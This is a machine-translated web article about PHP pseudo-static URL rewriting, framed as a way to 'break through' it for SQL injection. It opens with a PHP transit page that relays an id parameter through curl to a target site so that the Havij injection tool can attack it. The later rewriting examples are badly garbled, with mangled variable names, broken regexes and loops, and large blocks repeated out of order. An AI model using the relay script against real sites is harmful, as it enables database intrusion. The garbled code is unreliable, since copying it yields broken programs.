Principles of PHP pseudo-static technology and breakthrough principles

Last Update:2014-05-14 Source: Internet

Author: User

Tags havij

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

First, let's talk about the implementation method: inj. php: [php] & lt ;? Phpset_time_limit (10); $ id = $ _ GET [& quot; id & quot;]; $ id = str_replace (& quot;, & quot; % 20 & quot;, $ id); $ id = str_replace (& quot; = & quot;, & quot;

First, the implementation method is as follows:
Inj. php:
[Php]
Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.

$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>

Set_time_limit (10 );
$ Id = $ _ GET ["id"];
$ Id = str_replace ("", "% 20", $ id );
$ Id = str_replace ("=", "% 3D", $ id );
$ Url = "http://www.xxx.com/index.php/library/more/id/mongoid.html ";
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "$ url ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); // When enabled, the information obtained by curl_init () is returned in the form of a file stream, rather than directly output
Curl_setopt ($ ch, CURLOPT_HEADER, 0); // When enabled, the header file information is output as a data stream.

$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Use wamp to build a server, put inj. php in wamp/www/, and then run http: // 127.0.0.1/inj. php in Havij? Id = 1

==================================
PHP pseudo-static implementation method 1 (using the functions of the Apache server)

1. check whether Apache supports mod_rewrite.
2. enable Apache to support. htaccess
3. create a. htaccess file
4. rules:
RewriteEngine on
RewriteRule (%a-za-z%}1,%}-(%0-9%}1,%}.html $ index. php? Action = $1 & id = $2
([A-zA-Z] {1,})-([0-9] {1,}) What is the URL length?
$1 is ([a-zA-Z] {1,}) matched
$2 is matched by [0-9] {1 ,}
For example: www.xx.com/page-18.html
The actual URL is as follows:
Action = page
Id = 18

======================================
PHP pseudo-static implementation method 2 (encoding implementation)

$ Php2Html_FileUrl = $ _ SERVER ["REQUEST_URI"]
Echo $ Php2Html_FileUrl

Example: // localhost/php100/test. php? Id | 1 @ action | 2

[Php]
$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */

Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}

$ Php2Html_UrlString = str_replace ("? "," ", Str_replace ("/"," ", strrchr ($ Php2Html_FileUrl ,"/"),"? "))))
/*
Strrchr in the lower layer:/test. php? Id | 1 @ action | 2
Strrchr of the outer layer: id | 1 @ action | 2
Str_replace in the lower layer: remove the/number. this example does not contain
Str_replace of the outer layer: put? No. In this example
*/
$ Php2Html_UrlQueryStrList = explode ("@", $ Php2Html_UrlString );
/* Convert str into an array divided by @: id | 1 and action | 2 */

Foreach ($ Php2Html_UrlQueryStrList as $ Php2Html_UrlQueryStr)
{
$ Php2Html_TmpArray = explode ("|", $ Php2Html_UrlQueryStr );
/* Id => 1 and action => 2 */
$ _ GET [$ Php2Html_TmpArray [0] = $ Php2Html_TmpArray [1];
}

======================================
PHP pseudo-static implementation method 3 (encoding implementation)
Example: localhost/php100/test. php/1/2
[Php]
$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;

If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {

$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];

// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;

$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}

$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;

If (strtolower ($ filename) = 'Test. php '){
If (! Empty ($ _ GET [id]) {
$ Id = intval ($ _ GET [id]);
Echo $ id;
$ Action = intval ($ _ GET [action]);
Echo $ action;
} Else {

$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script = $ _ SERVER ["SRCIPT_NAME"];

// This sentence should be replaced by the section above the URL .. There are "1/2" and so on ..
$ Nav = ereg_replace ("$ script", "", urldecode ($ nav ));
Echo $ nav;

$ Vars = explode ("/", $ nav );
Print_r ($ vars );
$ Id = intval ($ vars [1]);
$ Action = intval ($ vars [2]);
}
Echo $ id. '&'. $ action;
}

======================================
PHP pseudo-static implementation method 4 (encoding implementation)
[Php]
Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]

$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );

$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html

$ Vars = explode ("/", $ nav );
Print_r ($ vars );

For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}

Function mod_rewrite (){
Global $ _ GET;
$ Nav = $ _ SERVER ["REQUEST_URI"];
$ Script_name = $ _ SERVER ["SCRIPT_NAME"]

$ Nav = substr (ereg_replace ("$ script_name"), "", urldecode ($ nav), 1 );

$ Nav = preg_replace ("/^. ht (m) {1} (l) {0, 1} $/"," ", $ nav); // remove the htm or html

$ Vars = explode ("/", $ nav );
Print_r ($ vars );

For ($ I = 0; $ I {
$ _ GET [$ vars [$ I] = $ vars [$ I + 1];
}
Return $ _ GET;
}

======================================
PHP pseudo-static implementation method 5 (encoding implementation)
Example:/, 8630.html
[Php]
If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";

If (preg_match ("/\/(\ d +), (\ d +), (\ d +) \. html/si", $ path_info, $ arr_path )){
$ Gid = intval ($ arr_path [1]); // get the value 1
$ Sid = intval ($ arr_path [2]); // get the value 100
$ Softid = intval ($ arr_path [3]); // get the value 8630
}
Else
Echo "Path: Error! ";

Conclusion: (1) the pseudo-static technology is a good breakthrough. you need to construct a transit injection page by yourself.

(2) The Principles of pseudo-static technology are very simple, that is, the original index. php? Id = 1.

$ Output = curl_exec ($ ch );
Curl_close ($ ch );
Print_r ($ output );
?>
Use wamp to build a server, put inj. php in wamp/www/, and then run http: // 127.0.0.1/inj. php in Havij? Id = 1

==================================
PHP pseudo-static implementation method 1 (using the functions of the Apache server)

======================================
PHP pseudo-static implementation method 2 (encoding implementation)

$ Php2Html_FileUrl = $ _ SERVER ["REQUEST_URI"]
Echo $ Php2Html_FileUrl

Example: // localhost/php100/test. php? Id | 1 @ action | 2

$ Filename = basename ($ _ SERVER ["SCRIPT_NAME"]);
Echo $ _ SERVER ["SCRIPT_NAME"];
Echo $ filename;

Conclusion: (1) the pseudo-static technology is a good breakthrough. you need to construct a transit injection page by yourself.

(2) The Principles of pseudo-static technology are very simple, that is, the original index. php? Id = 1.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More